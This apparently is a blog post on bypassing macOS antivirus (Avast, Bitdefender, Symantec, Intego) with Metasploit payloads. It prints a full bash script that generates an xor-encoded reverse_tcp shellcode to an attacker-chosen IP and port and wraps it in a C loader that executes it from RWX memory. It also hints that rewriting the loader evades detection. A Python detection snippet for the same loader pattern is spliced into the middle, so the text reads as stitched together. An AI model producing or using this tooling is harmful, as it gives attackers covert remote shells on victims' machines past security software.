Decided to upgrade the MacOS in my VirtualBox to High Sierra and do some testing using customized Metasploit payload loaders there.

Installed the https://www.avast.com/free-mac-security and tested the generators from last year (I was not expecting the results to bypass this AV actually :)) and as expected, the bypass from last year gets picked up now. ( https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/)

What is super-cool nowadays on MacOS is that when you run gcc in the terminal it will automatically prompt you to install the Xcode stuff from Apple, so this time I have used the following

So I went on to build my loaders, and all the payloads, no matter what, now get flagged by Avast.

And I started to wonder why …

My original code looked like this ->

#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read -r IP
echo -e "What Port Number are we gonna listen to? : \c"
read -r port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
  echo '[*] Found msfvenom in current path ........ good'
else
  echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
  exit 1
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c test.c temp.c
# Generate the payload as a C byte array (unsigned char buf[]) into test.c
./msfvenom -p osx/x64/dupandexecve/reverse_tcp EXITFUNC=process LHOST="$IP" LPORT="$port" -a x64 --platform OSX -e x64/xor -f c -o test.c
# Assemble the loader source: headers, the msfvenom buffer, then main()
echo '#include <stdio.h>' > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
# Map an anonymous RWX page, copy the buffer in and jump to it
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: %p\n", ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
  echo '[*] osx64-payload.c generated ...'
  ls -la osx64-payload.c
else
  echo '[-] Something went wrong .. '
  exit 1
fi

And once I put the generated (on Linux) source code onto the MacOS box and compiled it via gcc, it got flagged immediately.

What's interesting is that no matter what is in the unsigned char/signed char buffer, it gets flagged anyway, as you can see in the screenshot here.

So Avast seems to be flagging only the int main part, as it does not even try to see what the shellcode does … any bogus bytes can be in there … so now comes a 5 cent question … how hard is it to re-write the loader? :)

Hint .. about 5 seconds ?
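The loader shape the post says the AV keys on (an anonymous RWX mapping, a memcpy into it, and a cast-and-call) is easy to spot statically in source. As an added example, not code from the post, here is a small Python check over C source text that reports those three traits; both sample sources are constructed and contain no payload bytes:

```python
import re
from typing import List

# Constructed sample with the stub shape from the post; the payload bytes are
# deliberately left out (a single zero byte stands in for the msfvenom buffer).
SUSPECT_SOURCE = """
#include <sys/mman.h>
#include <string.h>
unsigned char buf[] = { 0x00 };  /* placeholder, not a real payload */
int main(int argc, char **argv)
{
void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
memcpy(ptr,buf,sizeof buf);
void (*fp)() = (void (*)())ptr;
fp();
}
"""

# Constructed benign sample: a read-only file mapping that is never executed.
BENIGN_SOURCE = """
#include <sys/mman.h>
int main(void)
{
void *p = mmap(0, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
return 0;
}
"""

# "<var> = mmap(<args>)" and "(void (*)())<var>" respectively
MMAP_RE = re.compile(r"(\w+)\s*=\s*mmap\s*\(([^;]*)\)")
FPTR_RE = re.compile(r"\(\s*void\s*\(\*\)\s*\(\s*\)\s*\)\s*(\w+)")

def scan_loader_pattern(src: str) -> List[str]:
    """Return the loader traits found in C source text (empty list = none)."""
    findings: List[str] = []
    rwx_ptrs: List[str] = []
    for m in MMAP_RE.finditer(src):
        var, args = m.group(1), m.group(2)
        if "PROT_EXEC" in args and "PROT_WRITE" in args:
            rwx_ptrs.append(var)
            findings.append(f"RWX mapping assigned to '{var}'")
    for var in rwx_ptrs:
        if re.search(rf"memcpy\s*\(\s*{var}\s*,", src):
            findings.append(f"memcpy into RWX pointer '{var}'")
        m = FPTR_RE.search(src)
        if m and m.group(1) == var:
            findings.append(f"'{var}' cast to a function pointer and called")
    return findings
```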

Same goes for Bitdefender for MacOS

And Symantec AV

And Intego Mac Internet Security X9

